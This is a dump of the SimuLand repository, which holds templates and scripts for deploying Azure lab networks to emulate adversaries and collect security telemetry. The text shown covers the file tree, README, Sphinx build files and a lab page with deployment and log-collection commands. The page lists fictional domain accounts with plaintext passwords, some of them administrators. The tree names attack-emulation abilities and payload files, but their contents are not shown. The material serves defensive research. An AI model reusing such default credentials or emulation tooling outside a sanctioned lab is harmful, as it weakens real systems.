├── .gitignore
├── LICENSE
├── README.md
├── docs
    ├── Makefile
    ├── build
    │   ├── doctrees
    │   │   ├── environment.pickle
    │   │   ├── environments
    │   │   │   ├── attack_evals.doctree
    │   │   │   ├── evals
    │   │   │   │   └── apt29.doctree
    │   │   │   ├── windows.doctree
    │   │   │   └── windows
    │   │   │   │   └── shire.doctree
    │   │   └── index.doctree
    │   └── html
    │   │   ├── .buildinfo
    │   │   ├── _images
    │   │       ├── mordor-apt29-design.png
    │   │       └── mordor-shire-design.png
    │   │   ├── _sources
    │   │       ├── environments
    │   │       │   ├── attack_evals.rst.txt
    │   │       │   ├── evals
    │   │       │   │   └── apt29.md.txt
    │   │       │   ├── windows.rst.txt
    │   │       │   └── windows
    │   │       │   │   └── shire.md.txt
    │   │       └── index.rst.txt
    │   │   ├── _static
    │   │       ├── basic.css
    │   │       ├── css
    │   │       │   ├── badge_only.css
    │   │       │   └── theme.css
    │   │       ├── doctools.js
    │   │       ├── documentation_options.js
    │   │       ├── file.png
    │   │       ├── fonts
    │   │       │   ├── Inconsolata-Bold.ttf
    │   │       │   ├── Inconsolata-Regular.ttf
    │   │       │   ├── Inconsolata.ttf
    │   │       │   ├── Lato-Bold.ttf
    │   │       │   ├── Lato-Regular.ttf
    │   │       │   ├── Lato
    │   │       │   │   ├── lato-bold.eot
    │   │       │   │   ├── lato-bold.ttf
    │   │       │   │   ├── lato-bold.woff
    │   │       │   │   ├── lato-bold.woff2
    │   │       │   │   ├── lato-bolditalic.eot
    │   │       │   │   ├── lato-bolditalic.ttf
    │   │       │   │   ├── lato-bolditalic.woff
    │   │       │   │   ├── lato-bolditalic.woff2
    │   │       │   │   ├── lato-italic.eot
    │   │       │   │   ├── lato-italic.ttf
    │   │       │   │   ├── lato-italic.woff
    │   │       │   │   ├── lato-italic.woff2
    │   │       │   │   ├── lato-regular.eot
    │   │       │   │   ├── lato-regular.ttf
    │   │       │   │   ├── lato-regular.woff
    │   │       │   │   └── lato-regular.woff2
    │   │       │   ├── RobotoSlab-Bold.ttf
    │   │       │   ├── RobotoSlab-Regular.ttf
    │   │       │   ├── RobotoSlab
    │   │       │   │   ├── roboto-slab-v7-bold.eot
    │   │       │   │   ├── roboto-slab-v7-bold.ttf
    │   │       │   │   ├── roboto-slab-v7-bold.woff
    │   │       │   │   ├── roboto-slab-v7-bold.woff2
    │   │       │   │   ├── roboto-slab-v7-regular.eot
    │   │       │   │   ├── roboto-slab-v7-regular.ttf
    │   │       │   │   ├── roboto-slab-v7-regular.woff
    │   │       │   │   └── roboto-slab-v7-regular.woff2
    │   │       │   ├── fontawesome-webfont.eot
    │   │       │   ├── fontawesome-webfont.svg
    │   │       │   ├── fontawesome-webfont.ttf
    │   │       │   ├── fontawesome-webfont.woff
    │   │       │   └── fontawesome-webfont.woff2
    │   │       ├── jquery-3.4.1.js
    │   │       ├── jquery.js
    │   │       ├── js
    │   │       │   ├── modernizr.min.js
    │   │       │   └── theme.js
    │   │       ├── language_data.js
    │   │       ├── minus.png
    │   │       ├── mordor-apt29-design.png
    │   │       ├── mordor-shire-design.png
    │   │       ├── plus.png
    │   │       ├── pygments.css
    │   │       ├── searchtools.js
    │   │       ├── underscore-1.3.1.js
    │   │       └── underscore.js
    │   │   ├── environments
    │   │       ├── attack_evals.html
    │   │       ├── evals
    │   │       │   └── apt29.html
    │   │       ├── windows.html
    │   │       └── windows
    │   │       │   └── shire.html
    │   │   ├── genindex.html
    │   │   ├── index.html
    │   │   ├── objects.inv
    │   │   ├── search.html
    │   │   └── searchindex.js
    ├── make.bat
    ├── requirements.txt
    └── source
    │   ├── _static
    │       ├── mordor-apt29-design.png
    │       └── mordor-shire-design.png
    │   ├── conf.py
    │   ├── environments
    │       ├── attack_evals.rst
    │       ├── evals
    │       │   └── apt29.md
    │       ├── windows.rst
    │       └── windows
    │       │   └── shire.md
    │   └── index.rst
└── environments
    ├── adversary-emulation-library
        ├── fin6
        │   ├── README.md
        │   └── caldera
        │   │   ├── Dockerfile
        │   │   ├── conf
        │   │       └── local.yml
        │   │   ├── plugin
        │   │       ├── data
        │   │       │   ├── abilities
        │   │       │   │   ├── collection
        │   │       │   │   │   └── fd27fe6c-4846-4e94-aef9-f6bc21ab0f0e.yml
        │   │       │   │   ├── credential-access
        │   │       │   │   │   ├── 97412b40-4940-4da1-8bff-6f11d42bca26.yml
        │   │       │   │   │   └── ff77db3d-ded1-48da-9885-8dfc097edec0.yml
        │   │       │   │   ├── discovery
        │   │       │   │   │   ├── 02a96c18-f700-482d-88a8-bd311f6c41dc.yml
        │   │       │   │   │   ├── 2738b811-a360-4a4f-af9d-704343ebab4d.yml
        │   │       │   │   │   ├── 5b24eef2-7a7f-4d34-8cab-e588074c59bc.yml
        │   │       │   │   │   ├── d30692dd-779f-4a40-b947-de23dabbb033.yml
        │   │       │   │   │   ├── e44a39ce-0651-3ddd-8f05-f83aa2ffd657.yml
        │   │       │   │   │   └── e4cdb5c6-d322-3b6e-ac8e-68b2e8a7dd4c.yml
        │   │       │   │   ├── execution
        │   │       │   │   │   ├── 0c752dce-9302-4465-805f-522650aece3f.yml
        │   │       │   │   │   ├── 5599b7cf-6e8d-43c1-a311-e953dd0fbd2a.yml
        │   │       │   │   │   ├── 5dcbd042-e8e5-4f3f-8055-7284e4d5112c.yml
        │   │       │   │   │   ├── 661efd66-d876-41de-88ee-ba9ec4328154.yml
        │   │       │   │   │   ├── b393c022-329a-4c52-ab1f-eb594ee8d3cd.yml
        │   │       │   │   │   ├── c29e9cc7-b34f-46c2-bdbe-a41f757eae24.yml
        │   │       │   │   │   ├── d77838f6-d562-3480-ad29-2cbeee8b7b45.yml
        │   │       │   │   │   ├── e4027dff-280b-4964-82be-b35a40c4a493.yml
        │   │       │   │   │   └── eb4c2ff6-3534-404c-bf1c-d864a508c162.yml
        │   │       │   │   ├── exfiltration
        │   │       │   │   │   ├── 78d94199-7e0e-442b-81a6-32f8e419a7ac.yml
        │   │       │   │   │   └── e74554b8-0bc9-3d50-95a4-e45421925b49.yml
        │   │       │   │   ├── lateral-movement
        │   │       │   │   │   ├── 6ffca252-9eb0-4ac0-93dd-35c9e7c6fae0.yml
        │   │       │   │   │   ├── e45dc48f-45f1-42d2-850c-4a15385c1646.yml
        │   │       │   │   │   └── f50f8f39-2fb0-4fe3-9e2d-9af38aee447d.yml
        │   │       │   │   ├── persistence
        │   │       │   │   │   ├── 0864a91a-ae17-1cce-8b89-d4f8f2854699.yml
        │   │       │   │   │   └── 44d82f6f-f367-4db7-aa65-a9e5717b1a21.yml
        │   │       │   │   └── privilege-escalation
        │   │       │   │   │   └── a89ea459-97ec-28fd-a552-9d305f023bbe.yml
        │   │       │   └── adversaries
        │   │       │   │   └── 123700e5-44c8-4894-a409-6484992c8846.yml
        │   │       └── hook.py
        │   │   └── sources
        │   │       └── ca7ef62d-20a0-493f-afd8-b5030c9a9f96.yml
        └── scripts
        │   └── ctid-aep-caldera.py
    ├── attack-evals
        ├── README.md
        └── apt29
        │   ├── README.md
        │   ├── azuredeploy.json
        │   ├── azuredeploy.parameters.json
        │   ├── caldera
        │       ├── conf
        │       │   └── 4fb34bde-b06d-445a-a146-8e35f79ce546.yml
        │       ├── data
        │       │   └── abilities
        │       │   │   └── host-provision
        │       │   │       └── 865b6ad9-ba59-435a-bd8f-641052fc077a.yml
        │       └── docker-compose-caldera.yml
        │   ├── kafkacat
        │       └── kafkacat.conf
        │   ├── logstash
        │       ├── Dockerfile
        │       ├── config
        │       │   └── logstash.yml
        │       ├── docker-compose.yml
        │       ├── pipeline
        │       │   └── eventhub.conf
        │       └── scripts
        │       │   └── logstash-entrypoint.sh
        │   ├── nestedtemplates
        │       ├── customScript.json
        │       ├── customScriptExtension.json
        │       └── vnet-dns-server.json
        │   ├── payloads
        │       ├── day1
        │       │   ├── attack-platform.zip
        │       │   └── victim.zip
        │       └── day2
        │       │   ├── attack-platform.zip
        │       │   └── victim.zip
        │   └── scripts
        │       ├── Invoke-Sandcat.ps1
        │       ├── Set-AD.ps1
        │       ├── Set-Adversary.sh
        │       ├── Set-Initial-Settings.ps1
        │       ├── Set-Logstash.sh
        │       ├── Set-Socat.sh
        │       ├── Set-Victim.ps1
        │       ├── Set-WEC.ps1
        │       ├── Start-Packet-Capture.sh
        │       └── Stop-Packet-Capture.sh
    ├── aws
        └── cloud-breach-s3
        │   ├── README.md
        │   ├── cfn-parameters
        │       ├── ec2-log-collector-parameters.json
        │       ├── ec2-nginx-parameters.json
        │       ├── enable-cloudtrail-parameters.json
        │       └── vpc-parameters.json
        │   ├── cfn-templates
        │       ├── ec2-log-collector.json
        │       ├── ec2-nginx.json
        │       ├── enable-cloudtrail.json
        │       ├── s3.json
        │       └── vpc.json
        │   ├── data
        │       └── ring.txt
        │   ├── deploy-cloud-breach.sh
        │   ├── kafka
        │       └── docker-compose.yml
        │   └── logstash
        │       ├── logstash-config-sample.conf
        │       └── logstash-sample.yml
    ├── azure
        └── solorigate-identity
        │   └── nestedtemplates
        │       └── SolorwindsWorkbookARM.json
    ├── research
        └── azure-ad-hybrid-adfs
        │   ├── azuredeploy-tenant-scope-test.json
        │   └── nestedtemplates
        │       └── IdentityWorkbookARM.json
    └── windows
        └── shire
            ├── README.md
            ├── azuredeploy.json
            ├── azuredeploy.parameters.json
            ├── kafkacat
                └── kafkacat.conf
            ├── logstash
                ├── Dockerfile
                ├── config
                │   └── logstash.yml
                ├── docker-compose.yml
                ├── pipeline
                │   └── eventhub.conf
                └── scripts
                │   └── logstash-entrypoint.sh
            ├── nestedtemplates
                ├── customScript.json
                ├── customScriptExtension.json
                └── vnet-dns-server.json
            └── scripts
                ├── Set-AD.ps1
                ├── Set-Initial-Settings.ps1
                ├── Set-Logstash.sh
                ├── Set-WEC.ps1
                ├── Start-Packet-Capture.sh
                └── Stop-Packet-Capture.sh


/.gitignore:
--------------------------------------------------------------------------------
1 | 
2 | .DS_Store
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SimuLand 🏝️
 2 | 
 3 | [![Open_Threat_Research Community](https://img.shields.io/badge/Open_Threat_Research-Community-brightgreen.svg)](https://twitter.com/OTR_Community)
 4 | [![Open Source Love](https://badges.frapsoft.com/os/v3/open-source.svg?v=103)](https://github.com/ellerbrock/open-source-badges/)
 5 | 
 6 | An initiative from the Open Threat Research (OTR) community to share cloud templates and scripts to deploy network environments to simulate adversaries, generate/collect data and learn more about adversary tradecraft from a defensive perspective. The difference with other environments is that we do not have one scenario to cover all use-cases, but multiple modular environments that adapt to specific topics of research. 
 7 | 
 8 | Think of this repository as the library of emulation/simulation plans but from an infrastructure perspective 🏗️
 9 | 
10 | We started by sharing ATT&CK evaluations environment templates with the community (i.e [APT29 Scenario](https://github.com/OTRF/SimuLand/tree/master/environments/attack-evals/apt29)). Now we are expanding our scope and building more templates for other projects such as:
11 | 
12 | * [Center for Threat Informed Defense - Adversary Emulation Library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library)
13 |     * ATT&CK Evaluations
14 | * [RhinoSecurityLabs - CloudGoat](https://github.com/RhinoSecurityLabs/cloudgoat)
15 | 
16 | Finally, we do not only create these environments for someone to follow an attack path and execute it, but also to collect and share telemetry. Every environment built under the project `SimuLand` has a data pipeline to export the data collected during the simulation and share it with the community officially through the [Mordor Project](https://github.com/OTRF/mordor).
17 | 
18 | ## Author
19 | 
20 | Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g)
21 | 


--------------------------------------------------------------------------------
/docs/Makefile:
--------------------------------------------------------------------------------
 1 | # Minimal makefile for Sphinx documentation
 2 | #
 3 | 
 4 | # You can set these variables from the command line, and also
 5 | # from the environment for the first two.
 6 | SPHINXOPTS    ?=
 7 | SPHINXBUILD   ?= sphinx-build
 8 | SOURCEDIR     = source
 9 | BUILDDIR      = build
10 | 
11 | # Put it first so that "make" without argument is like "make help".
12 | help:
13 | 	@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
14 | 
15 | .PHONY: help Makefile
16 | 
17 | # Catch-all target: route all unknown targets to Sphinx using the new
18 | # "make mode" option.  $(O) is meant as a shortcut for $(SPHINXOPTS).
19 | %: Makefile
20 | 	@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
21 | 


--------------------------------------------------------------------------------
/docs/build/doctrees/environment.pickle:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/doctrees/environment.pickle


--------------------------------------------------------------------------------
/docs/build/doctrees/environments/attack_evals.doctree:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/doctrees/environments/attack_evals.doctree


--------------------------------------------------------------------------------
/docs/build/doctrees/environments/evals/apt29.doctree:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/doctrees/environments/evals/apt29.doctree


--------------------------------------------------------------------------------
/docs/build/doctrees/environments/windows.doctree:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/doctrees/environments/windows.doctree


--------------------------------------------------------------------------------
/docs/build/doctrees/environments/windows/shire.doctree:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/doctrees/environments/windows/shire.doctree


--------------------------------------------------------------------------------
/docs/build/doctrees/index.doctree:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/doctrees/index.doctree


--------------------------------------------------------------------------------
/docs/build/html/.buildinfo:
--------------------------------------------------------------------------------
1 | # Sphinx build info version 1
2 | # This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done.
3 | config: c708dfd1439c03b686474f7fcd181911
4 | tags: 645f666f9bcd5a90fca523b33c5a78b7
5 | 


--------------------------------------------------------------------------------
/docs/build/html/_images/mordor-apt29-design.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_images/mordor-apt29-design.png


--------------------------------------------------------------------------------
/docs/build/html/_images/mordor-shire-design.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_images/mordor-shire-design.png


--------------------------------------------------------------------------------
/docs/build/html/_sources/environments/attack_evals.rst.txt:
--------------------------------------------------------------------------------
1 | ATT&CK Evaluations
2 | ==================
3 | 
4 | .. toctree::
5 |    :maxdepth: 2
6 | 
7 |    APT29 <evals/apt29>


--------------------------------------------------------------------------------
/docs/build/html/_sources/environments/windows.rst.txt:
--------------------------------------------------------------------------------
1 | Windows Environments
2 | ====================
3 | 
4 | .. toctree::
5 |    :maxdepth: 2
6 | 
7 |    Shire <windows/shire>


--------------------------------------------------------------------------------
/docs/build/html/_sources/environments/windows/shire.md.txt:
--------------------------------------------------------------------------------
  1 | # Shire Environment
  2 | 
  3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2Fmordor-labs%2Fmaster%2Fenvironments%2Fwindows%2Fshire%2Fazuredeploy.json) [![Visualize](https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/1-CONTRIBUTION-GUIDE/images/visualizebutton.png)](http://armviz.io/#/?load=https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2Fmordor-labs%2Fmaster%2Fenvironments%2Fwindows%2Fshire%2Fazuredeploy.json)
  4 | 
  5 | ## Network Design
  6 | 
  7 | ![](../../_static/mordor-shire-design.png)
  8 | 
  9 | ## Domain Users Information
 10 | 
 11 | | FirstName | LastName | SamAccountName | Department | JobTitle | Password | Identity | UserContainer | 
 12 | |:--- |:--- |:--- |:--- |:--- |:--- |:--- |:--- |
 13 | | Norah | Martha | nmartha | Human Resources | HR Director | S@l@m3!123 | Users | DomainUsers | 
 14 | | Pedro | Gustavo | pgustavo | IT Support | CIO | W1n1!2019 | Domain Admins | DomainUsers |
 15 | | Lucho | Rodriguez | lrodriguez | Accounting | VP | T0d@y!2019 | Users | DomainUsers |
 16 | | Stevie | Beavers | sbeavers | Sales | Agent | B1gM@c!2020 | Users | DomainUsers |
 17 | | Pam | Beesly | pbeesly | Reception | Receptionist | Fl0nk3rt0n!T0by | Users | DomainUsers |
 18 | | Dwight | Schrute | dschrute | Sales | Assistant | Schrut3F@rms!B33ts | Users | DomainUsers |
 19 | | Michael | Scott | mscott | Management | BestBoss | abc123!D@t3M1k3 | Domain Admins | DomainUsers | 
 20 | | Sysmon | MS | sysmonsvc | IT Support | Service Account | Buggy!1122 | Users | DomainUsers |
 21 | 
 22 | ## Data Sources Collected
 23 | 
 24 | * [Windows Security Auditing](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Enable-WinAuditCategories.ps1)
 25 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmonv11.0.xml)
 26 | * [WEF Subscriptions](https://github.com/OTRF/Blacksmith/tree/master/resources/configs/wef/subscriptions)
 27 | * [SACL Audit Rules](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Set-SACLs.ps1)
 28 | 
 29 | ## Deployment
 30 | 
 31 | #### Point-To-Site VPN Certificates Setup
 32 | 
 33 | * [Create root CA certificate](https://blacksmith.readthedocs.io/en/latest/azure_p2s_vpn_setup.html#create-a-root-ca-certificate)
 34 | * Get the name of it (CN= Root CA Name)
 35 | * Get the root CA cert data by running the following commands and save it to pass it as a parameter while creating the environment.
 36 | 
 37 | ```
 38 | openssl x509 -in caCert.pem -outform der | base64 | pbcopy
 39 | ```
 40 | * [Create a client Certificate signed with the CA’s root key](https://blacksmith.readthedocs.io/en/latest/azure_p2s_vpn_setup.html#create-a-client-certificate-signed-with-the-ca-s-root-key)
 41 | 
 42 | ### Deploy Environment
 43 | 
 44 | * Clone the project and change your directory to windows one
 45 | 
 46 | ```
 47 | https://github.com/OTRF/mordor-labs
 48 | cd mordor-labs/tree/master/environments/windows/shire
 49 | ```
 50 | 
 51 | * [Install and set up Azure CLI](https://blacksmith.readthedocs.io/en/latest/azure_cli_setup.html)
 52 | * Create an Azure Resource group
 53 | 
 54 | ```
 55 | az group create --location eastus --resource-group MyResourceGroup
 56 | ```
 57 | 
 58 | * Use the following commands to create the environment
 59 | 
 60 | ```
 61 | az group deployment create --name <Deployment Name> --resource-group <Resource Group Name> --template-file azuredeploy.json --parameters adminUsername=<USERNAME> adminPassword='<PASSWORD>' clientRootCertName=<Root CA Certificate Name> clientRootCertData="<Root CA Cert Data>"
 62 | ```
 63 | 
 64 | ## Connect to Environment (P2S VPN)
 65 | 
 66 | VMs deployed in Azure will not be accessible via their Public IP addresses. A Point-To-Site (P2S) VPN is set up and you will need to use a client certificate signed with the CA's root private key created earlier. 
 67 | 
 68 | * [Set up OpenVPN Client](https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-howto-openvpn-clients)
 69 |     * Use the Client's Certificate (PEM format)
 70 |     * Use the Client's Private Key (PEM format)
 71 | * RDP or SSH to the Windows and Linux endpoints in the environment.
 72 | 
 73 | ## Collect Security Event Logs
 74 | 
 75 | This environment comes with a data pipeline option to collect security event logs from Windows Endpoints via Windows Event Forwarding (WEF) configurations, send them to a Logstash pipeline which sends them over to an Azure Event Hub. From there, one could use tools such as Kafkacat to connect to the Azure Event hub, consume events being sent over and write them to a local JSON file in real-time.
 76 | 
 77 | ### Install Kafkacat
 78 | 
 79 | On recent enough Debian systems:
 80 | 
 81 | ```
 82 | apt-get install kafkacat
 83 | ```
 84 | 
 85 | And on Mac OS X with homebrew installed:
 86 | 
 87 | ```
 88 | brew install kafkacat
 89 | ```
 90 | 
 91 | ### Kafkacat Conf File Setup
 92 | 
 93 | Make sure you update the [**Kafkacat.conf**](https://github.com/OTRF/mordor-labs/blob/master/environments/windows/kafkacat/kafkacat.conf) with the values from your environment.
 94 | 
 95 | **Run Kafkacat and Consume Events**
 96 | 
 97 | Once you create the environment, you can run the following command to start consuming events from the Azure Event Hub and write them to a local JSON file:
 98 | 
 99 | ```
100 | kafkacat -b <eventhub-namespace>.servicebus.windows.net:9093 -t <eventhunb-name> -F kafkacat.conf -C -o end > mordor_$(date +%F%H%M%S).json
101 | ```
102 | 
103 | I would run that command right before emulating adversary techniques.
104 | 
105 | ## Collect PCAP (East-West)
106 | 
107 | This environment is set up to start a [packet capture](https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-packet-capture-overview) via the [Azure Network Watcher extension](https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/network-watcher-windows) installed on every Windows VM. Every PCAP is sent to an Azure storage account defined at the moment you start the pcap session. I would do it once you are ready to start the execution of the emulation plan.
108 | 
109 | ### Start Packet Capture
110 | 
111 | ```
112 | bash Start-Packet-Capture.sh -r <Resource Group name> -s <Storage Account name> -c WORKSTATION1,WORKSTATION2
113 | ```
114 | 
115 | ### Stop Packet Capture
116 | 
117 | You can stop the packet capture sessions by running the following command. This does not delete the packet capture session. You will have to delete it if you want to start it again.
118 | 
119 | ```
120 | bash Stop-Packet-Capture.sh -r <Resource Group name> -c WORKSTATION1,WORKSTATION2 -l eastus
121 | ```
122 | 
123 | You can stop and delete the packet captures with the following command:
124 | 
125 | ```
126 | bash Stop-Packet-Capture.sh -r <Resource Group name> -c WORKSTATION1,WORKSTATION2 -l eastus -d
127 | ```
128 | 


--------------------------------------------------------------------------------
/docs/build/html/_sources/index.rst.txt:
--------------------------------------------------------------------------------
 1 | .. Mordor Labs documentation master file, created by
 2 |    sphinx-quickstart on Wed Jun 10 12:05:49 2020.
 3 |    You can adapt this file completely to your liking, but it should at least
 4 |    contain the root `toctree` directive.
 5 | 
 6 | Welcome to Mordor Labs
 7 | ======================
 8 | 
 9 | Cloud Templates and scripts to deploy network environments **exclusively** to generate datasets for the `Mordor project <https://mordordatasets.com>`_.
10 | 
11 | Liability / Responsible Usage
12 | #############################
13 | 
14 | This content is **ONLY** to be used to create research opportunities and generate datasets for the `Mordor project <https://mordordatasets.com>`_.
15 | 
16 | .. toctree::
17 |    :maxdepth: 2
18 |    :caption: Environments:
19 | 
20 |    ATT&CK Evals <environments/attack_evals>
21 |    Windows <environments/windows>
22 | 


--------------------------------------------------------------------------------
/docs/build/html/_static/css/badge_only.css:
--------------------------------------------------------------------------------
1 | .fa:before{-webkit-font-smoothing:antialiased}.clearfix{*zoom:1}.clearfix:before,.clearfix:after{display:table;content:""}.clearfix:after{clear:both}@font-face{font-family:FontAwesome;font-weight:normal;font-style:normal;src:url("../fonts/fontawesome-webfont.eot");src:url("../fonts/fontawesome-webfont.eot?#iefix") format("embedded-opentype"),url("../fonts/fontawesome-webfont.woff") format("woff"),url("../fonts/fontawesome-webfont.ttf") format("truetype"),url("../fonts/fontawesome-webfont.svg#FontAwesome") format("svg")}.fa:before{display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:normal;line-height:1;text-decoration:inherit}a .fa{display:inline-block;text-decoration:inherit}li .fa{display:inline-block}li .fa-large:before,li .fa-large:before{width:1.875em}ul.fas{list-style-type:none;margin-left:2em;text-indent:-0.8em}ul.fas li .fa{width:.8em}ul.fas li .fa-large:before,ul.fas li .fa-large:before{vertical-align:baseline}.fa-book:before{content:""}.icon-book:before{content:""}.fa-caret-down:before{content:""}.icon-caret-down:before{content:""}.fa-caret-up:before{content:""}.icon-caret-up:before{content:""}.fa-caret-left:before{content:""}.icon-caret-left:before{content:""}.fa-caret-right:before{content:""}.icon-caret-right:before{content:""}.rst-versions{position:fixed;bottom:0;left:0;width:300px;color:#fcfcfc;background:#1f1d1d;font-family:"Lato","proxima-nova","Helvetica Neue",Arial,sans-serif;z-index:400}.rst-versions a{color:#2980B9;text-decoration:none}.rst-versions .rst-badge-small{display:none}.rst-versions .rst-current-version{padding:12px;background-color:#272525;display:block;text-align:right;font-size:90%;cursor:pointer;color:#27AE60;*zoom:1}.rst-versions .rst-current-version:before,.rst-versions .rst-current-version:after{display:table;content:""}.rst-versions .rst-current-version:after{clear:both}.rst-versions .rst-current-version .fa{color:#fcfcfc}.rst-versions .rst-current-version .fa-book{float:left}.rst-versions .rst-current-version .icon-book{float:left}.rst-versions .rst-current-version.rst-out-of-date{background-color:#E74C3C;color:#fff}.rst-versions .rst-current-version.rst-active-old-version{background-color:#F1C40F;color:#000}.rst-versions.shift-up{height:auto;max-height:100%;overflow-y:scroll}.rst-versions.shift-up .rst-other-versions{display:block}.rst-versions .rst-other-versions{font-size:90%;padding:12px;color:gray;display:none}.rst-versions .rst-other-versions hr{display:block;height:1px;border:0;margin:20px 0;padding:0;border-top:solid 1px #413d3d}.rst-versions .rst-other-versions dd{display:inline-block;margin:0}.rst-versions .rst-other-versions dd a{display:inline-block;padding:6px;color:#fcfcfc}.rst-versions.rst-badge{width:auto;bottom:20px;right:20px;left:auto;border:none;max-width:300px;max-height:90%}.rst-versions.rst-badge .icon-book{float:none}.rst-versions.rst-badge .fa-book{float:none}.rst-versions.rst-badge.shift-up .rst-current-version{text-align:right}.rst-versions.rst-badge.shift-up .rst-current-version .fa-book{float:left}.rst-versions.rst-badge.shift-up .rst-current-version .icon-book{float:left}.rst-versions.rst-badge .rst-current-version{width:auto;height:30px;line-height:30px;padding:0 6px;display:block;text-align:center}@media screen and (max-width: 768px){.rst-versions{width:85%;display:none}.rst-versions.shift{display:block}}
2 | 


--------------------------------------------------------------------------------
/docs/build/html/_static/documentation_options.js:
--------------------------------------------------------------------------------
 1 | var DOCUMENTATION_OPTIONS = {
 2 |     URL_ROOT: document.getElementById("documentation_options").getAttribute('data-url_root'),
 3 |     VERSION: '0.1',
 4 |     LANGUAGE: 'None',
 5 |     COLLAPSE_INDEX: false,
 6 |     BUILDER: 'html',
 7 |     FILE_SUFFIX: '.html',
 8 |     HAS_SOURCE: true,
 9 |     SOURCELINK_SUFFIX: '.txt',
10 |     NAVIGATION_WITH_KEYS: false
11 | };


--------------------------------------------------------------------------------
/docs/build/html/_static/file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/file.png


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Inconsolata-Bold.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Inconsolata-Bold.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Inconsolata-Regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Inconsolata-Regular.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Inconsolata.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Inconsolata.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato-Bold.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato-Bold.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato-Regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato-Regular.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-bold.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-bold.eot


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-bold.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-bold.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-bold.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-bold.woff


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-bold.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-bold.woff2


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-bolditalic.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-bolditalic.eot


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-bolditalic.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-bolditalic.ttf


--------------------------------------------------------------------------------
